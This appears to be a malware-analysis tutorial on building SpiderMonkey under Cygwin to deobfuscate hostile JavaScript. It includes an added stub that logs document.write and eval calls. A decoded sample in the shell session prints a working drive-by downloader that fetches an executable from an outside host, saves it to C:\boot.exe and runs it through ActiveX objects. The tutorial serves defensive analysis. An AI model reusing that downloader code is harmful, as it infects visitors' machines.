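When analyzing a malicious script, you can simply modify it and check the result in a web browser, but because of the risk that carries, you can use SpiderMonkey instead.
On Linux, it can be installed and used with a single command: yum install js-devel
While looking for a way to use it on Windows, I found that it can be compiled and used under Cygwin.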
- Install Cygwin with gcc and standard C libraries.
- Download and untar Stevens' SpiderMonkey source tarball.
- In js/src/config/Linux_All.mk find the line that begins with MKSHLIB and change the ld linker syntax by replacing '-shared' with '-r':
$ grep -n MKSHLIB config/Linux_All.mk
50:MKSHLIB = $(LD) -shared $(XMKSHLIBOPTS)
- Build using make with the following syntax:
$ make -f Makefile.ref OS_ARCH='Linux' -k
We're essentially lying to make to get it to build as if our Cygwin environment is a Linux box. This is why shared linking breaks. But it should be a non-issue.
- The make will exit with errors, but if all went well, the JavaScript shell, js.exe, has already been built:
$ cd Linux_All_DBG.OBJ
$ ls -l js.exe
-rwxr-xr-x 1 nobody None 1493267 Dec 27 17:40 js.exe
$ cp js.exe /bin/
$ ./js.exe
js> document.write("oh word!");
js> ^C
$ cat write.log
oh word!
After installation, it can be used as follows.
C:\Users\ByJJoon\Downloads\Test>wget http://handlers.sans.org/dwesemann/decode/example.js
--2010-05-08 04:35:00-- http://handlers.sans.org/dwesemann/decode/example.js
Resolving handlers.sans.org... 74.208.112.68
Connecting to handlers.sans.org|74.208.112.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3608 (3.5K) [application/x-javascript]
Saving to: `example.js'
100%[==============================================================================>] 3,608 --.-K/s in 0s
2010-05-08 04:35:00 (23.6 MB/s) - `example.js' saved [3608/3608]
C:\Users\ByJJoon\Downloads\Test>js example.js
var url,path;url="http://cool.47555.om/1xxxx.exe";path="C:\\boot.exe";try{var ado=(document.createElement("object"));var d=1;ado.setAttribute("classid","clsid:BD96C776-65A3-11D0-983A-00C04FC29E36");var e=1;var xml=ado.CreateObject("Microsoft.XMLHTTP","");var f=1;var ab="Adodb.";var cd="Stream";var g=1;var as=ado.createobject(ab+cd,"");var h=1;xml.Open("GET",url,0);xml.Send();as.type=1;var n=1;as.open();as.write(xml.responseBody);as.savetofile(path,2);as.close();var shell=ado.createobject("Shell.Application","");shell.ShellExecute(path,"","","open",0);}catch(e){};
C:\Users\ByJJoon\Downloads\Test>
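The session above relies on the patched shell providing document.write and logging what is written. As an added example (not code from this post or from Stevens' patch), the following stub captures the same output in a JavaScript shell that has no document object, and additionally records strings passed to eval instead of executing them; decode(), SAMPLE and the log format are names assumed here.

```javascript
// Added example: capture stubs for a JavaScript shell without a document object.
// decode() and SAMPLE are constructed for illustration.

// Constructed, harmless sample: builds "<b>hi</b>" from character codes,
// writes it, then passes the unescape()d string "var a=1;" to eval.
var SAMPLE =
  'var s="";var c=[60,98,62,104,105,60,47,98,62];' +
  'for(var i=0;i<c.length;i++){s+=String.fromCharCode(c[i]);}' +
  'document.write(s);' +
  'eval(unescape("%76%61%72%20%61%3D%31%3B"));';

function decode(source) {
  var log = [];
  // Build a recorder that stores its arguments instead of acting on them.
  var record = function (via) {
    return function () {
      log.push({ via: via, data: Array.prototype.join.call(arguments, "") });
    };
  };
  var fakeDocument = {
    write: record("document.write"),
    writeln: record("document.writeln")
  };
  var fakeEval = record("eval");
  try {
    // The parameters shadow the globals "document" and "eval" inside the sample,
    // so the next decoding layer is logged rather than run.
    var run = new Function("document", "eval", source);
    run(fakeDocument, fakeEval);
  } catch (e) {
    // DOM calls that are not stubbed end up here; record where the sample stopped.
    log.push({ via: "error", data: String(e) });
  }
  return log;
}

// print() exists in the SpiderMonkey shell, console.log elsewhere.
var emit = typeof print === "function" ? print : console.log;
decode(SAMPLE).forEach(function (entry) {
  emit("[" + entry.via + "] " + entry.data);
});
```

The shadowing only covers direct references to document and eval; a sample that reaches them another way (for example through this) is not intercepted, so the shell should still run in an isolated analysis environment.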
Source: http://pmelson.blogspot.com/2007/12/building-didier-stevens-spidermonkey-in.html